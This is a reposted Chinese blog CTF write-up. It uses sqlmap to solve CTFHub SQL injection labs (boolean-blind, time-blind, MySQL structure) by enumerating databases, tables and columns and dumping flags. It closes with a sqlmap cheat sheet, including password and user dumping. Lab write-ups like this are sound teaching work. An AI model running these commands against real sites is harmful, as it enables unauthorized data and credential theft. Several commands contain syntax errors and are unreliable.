自学内容网 自学内容网

sqlmap使用

布尔盲注

python3 sqlmap.py -u "CTFHub 环境实例 | 提示信息" --current-db --batch

这里可以看出 sqlmap爆出了数据库名sqli

python3 sqlmap.py -u "CTFHub 环境实例 | 提示信息" --current-db --batch -D sqli --tables

然后我们在查看数据库里的表名

这里爆出了表名 news和flag 我们继续查看表flag里的字段

python3 sqlmap.py -u "CTFHub 环境实例 | 提示信息" -T flag --columns

接下来查看flag表里的全部数据

python3 sqlmap.py -u "CTFHub 环境实例 | 提示信息" -T flag --dump

就得到了flag

这道题是时间盲注

python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" --current-db --batch

还是先爆出数据库名

python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" -D sqli --tables --batch

python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" -D sqli -T flag --columns --batch

查看flag里的全部字段

python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" -D sqli -T flag --dump --batch

就得到了flag

第三道题是mysql结构 但我们依旧使用sqlmap

python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" --current-db --batch

依旧是sqli的数据库然后爆出表名

python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" -D sqli --tables --batch

然后再查看表里的数据

python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" -D sqli -T hlxepzysxe --columns --batch

我们查看表里的全部字段

sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" --batch -T hlxepzysxe --dump

就得到了flag

sqlmap详细命令:

-is-dba 当前用户权限(是否为root权限)

-dbs 所有数据库

-current-db 网站当前数据库

-users 所有数据库用户

-current-user 当前数据库用户

-random-agent 构造随机user-agent

-passwords 数据库密码

快速入门;SQLmap(常规)使用步骤

检测「注入点」    sqlmap -u 'http://xx/?id=1'
查看所有「数据库」  sqlmap -u 'http://xx/?id=1' --dbs
查看当前使用的数据库   sqlmap -u 'http://xx/?id=1' --current-db
查看「数据表」  sqlmap -u 'http://xx/?id=1' -D 'security' --tables

查看「字段」 sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --tables
查看「数据」sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --dump


原文地址:https://blog.csdn.net/2403_87533599/article/details/145180900

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!